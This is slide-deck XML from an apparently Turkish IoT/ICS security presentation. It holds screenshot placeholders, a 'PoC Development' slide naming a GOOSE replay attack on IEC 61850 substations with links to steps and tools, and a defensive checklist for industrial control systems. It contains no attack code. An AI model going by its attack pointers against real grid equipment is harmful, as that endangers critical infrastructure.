            <a:ext cx="9144003" cy="4116587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;343;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pic>
        <p:nvPicPr>
          <p:cNvPr id="348" name="Google Shape;348;p49" title="Screenshot 2025-05-30 at 10.30.59.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="305475" y="152400"/>
            <a:ext cx="6828023" cy="2228876"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="349" name="Google Shape;349;p49" title="Screenshot 2025-05-30 at 10.31.17.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="305475" y="2381276"/>
            <a:ext cx="5654869" cy="2457425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451425" y="152400"/>
            <a:ext cx="50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Genel Nesne Yönelimli Trafo Merkezi Olayı</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Google Shape;351;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id="356" name="Google Shape;356;p50" title="Screenshot 2025-05-30 at 10.31.43.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="48620" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322500" y="160900"/>
            <a:ext cx="6819350" cy="2486150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Google Shape;357;p50" title="Screenshot 2025-05-30 at 10.32.02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="322501" y="2647051"/>
            <a:ext cx="5866650" cy="2100025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Google Shape;358;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5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364" name="Google Shape;364;p51" title="Screenshot 2025-06-01 at 10.42.43.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;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5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371" name="Google Shape;371;p52" title="Screenshot 2025-05-30 at 09.12.20.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="42804" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1262475"/>
            <a:ext cx="9144000" cy="2278226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;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5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378" name="Google Shape;378;p53" title="Screenshot 2025-06-01 at 10.42.05.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;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136" name="Google Shape;136;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2158950" y="3988725"/>
            <a:ext cx="8520600" cy="7926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sz="6000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:schemeClr val="lt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385" name="Google Shape;385;p54" title="Screenshot 2025-06-01 at 10.41.48.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;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392" name="Google Shape;392;p55" title="Screenshot 2025-06-01 at 10.41.03.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-58175" y="0"/>
            <a:ext cx="9202174" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Google Shape;393;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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="999325"/>
            <a:ext cx="8520600" cy="1342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PoC Development</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899600" y="3128675"/>
            <a:ext cx="6501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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Steps: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://my.pcloud.com//#page=filemanager&amp;folder=17164076440</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toolset:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.infotech.pl/products/downloads/trials-for-iec-61850</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Google Shape;400;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3334967" y="2271742"/>
            <a:ext cx="30000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1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Goose Replay Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk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5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406" name="Google Shape;406;p57" title="Screenshot 2025-06-01 at 10.40.20.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="42400"/>
            <a:ext cx="9143998" cy="5101099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Google Shape;407;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5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413" name="Google Shape;413;p58" title="Screenshot 2025-06-01 at 10.40.37.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143998" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Google Shape;414;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420" name="Google Shape;420;p59" title="Screenshot 2025-06-01 at 10.43.50.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="421" name="Google Shape;421;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6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427" name="Google Shape;427;p60" title="Screenshot 2025-06-01 at 10.44.11.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;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6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pic>
        <p:nvPicPr>
          <p:cNvPr id="434" name="Google Shape;434;p61" title="Screenshot 2025-06-01 at 10.44.42.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Google Shape;435;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6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441" name="Google Shape;441;p6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442" name="Google Shape;442;p62" title="Screenshot 2025-05-30 at 10.22.24.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="4049" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Google Shape;443;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6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449" name="Google Shape;449;p6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450" name="Google Shape;450;p63" title="Screenshot 2025-05-30 at 09.25.48.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10097" l="0" r="0" t="8799"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144003" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;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19" title="ChatGPT Image May 28, 2025 at 11_05_47 PM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="11449"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="266350"/>
            <a:ext cx="4991099" cy="4419574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3805000" y="1935000"/>
            <a:ext cx="8520600" cy="7926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sz="6000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IoT Security</a:t>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="6000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p19"/>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64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422800" y="2078125"/>
            <a:ext cx="3557100" cy="841200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700"/>
              <a:t>ICS Sistemler için Kontrol Listesi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="456" name="Google Shape;456;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233672" y="228600"/>
            <a:ext cx="4690800" cy="4690800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138700" y="286700"/>
            <a:ext cx="10126200" cy="4953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 sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Ağ Mimarisi ve Segmentasyon</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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IT (bilgi teknolojileri) ve OT (operasyonel teknolojiler) ağları birbirinden ayrılmış mı?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DMZ (Demilitarized Zone) doğru şekilde yapılandırılmış mı?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SCADA ağı internete doğrudan bağlı mı? (→ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Olmamalı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a: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Endüstriyel protokoller (Modbus, DNP3, GOOSE, Profinet, vs.) sadece OT içinde mi çalışıyor?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VLAN segmentasyonu uygulanmış mı?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Erişim Kontrolleri</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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Kullanıcı hesapları minimum ayrıcalık prensibiyle yapılandırılmış mı?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Her cihaz ve SCADA terminali benzersiz kullanıcılarla mı çalışıyor?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Kimlik doğrulama mekanizmaları (örneğin MFA) aktif mi?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Eski/kullanılmayan kullanıcı hesapları sistemden kaldırılmış mı?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Uzaktan erişim sadece güvenli yollarla mı sağlanıyor (VPN, bastion host vs.)?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Yama ve Güncelleme Yönetimi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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Sistemlerde kullanılan tüm yazılımların güncel bir envanteri mevcut mu?</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Kritik sistemlerde güncelleme prosedürü (test → uygulama) belirlenmiş mi?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İşletim sistemleri ve kontrol yazılımları (HMI, PLC yazılımları vs.) güncel mi?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Hatalı/bozuk yazılım versiyonları geri alınabiliyor mu (rollback planı)?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="462" name="Google Shape;462;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66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138700" y="286700"/>
            <a:ext cx="10126200" cy="402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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Güvenlik Duvarları ve İzleme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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SCADA/PLC ağ geçitlerinde güvenlik duvarları konumlandırılmış mı?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Sadece izinli port ve protokoller açık mı?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Anomali tabanlı IDS/IPS sistemleri (örn. Snort, Suricata, Zeek) aktif mi?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OT ağındaki tüm trafiği analiz eden bir izleme aracı mevcut mu? (örn. Wireshark, Arkime, Nozomi, Dragos)</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. Cihaz Güvenliği (PLC/HMI/RTU)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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PLC'lerde varsayılan parolalar değiştirilmiş mi?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Gerekli olmayan servisler/devre dışı bırakılmış mı?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Yetkisiz fiziksel erişim engellenmiş mi?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Konfigürasyon yedekleri güvenli şekilde saklanıyor mu?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>6. Varlık Envanteri ve İzleme</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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Ağda hangi cihazın nerede olduğu, IP/MAC adresi, yazılım sürümü kayıtlı mı?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Yeni cihazlar eklendiğinde loglanıyor ve kontrol ediliyor mu?</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OT varlıkları için sürekli güncel envanter tutuluyor mu?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110950" y="37025"/>
            <a:ext cx="10126200" cy="5502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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7. Zafiyet Yönetimi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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CVE bazlı güvenlik taramaları ICS ortamına uygun araçlarla yapılıyor mu?</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Üçüncü parti bileşenlerin güvenlik açıkları takip ediliyor mu?</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ICS spesifik zafiyet kaynakları (CISA ICS Advisories, MITRE ATT&amp;CK for ICS, CVSS-E for ICS) takip ediliyor mu?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8. Test ve Simülasyon</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="15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Yedekli test ortamı mevcut mu? (Gerçek sistemleri etkilemeden test yapabilmek için)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Penetrasyon testleri, purple/red team tatbikatları yapılıyor mu?</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GOOSE/Modbus replay/injection gibi OT'ye özgü saldırılar test edildi mi?</a:t>
            </a:r>
            <a:endParaRPr sz="1100">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500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9. Olay Müdahale ve Kayıt Yönetimi</a:t>
            </a:r>
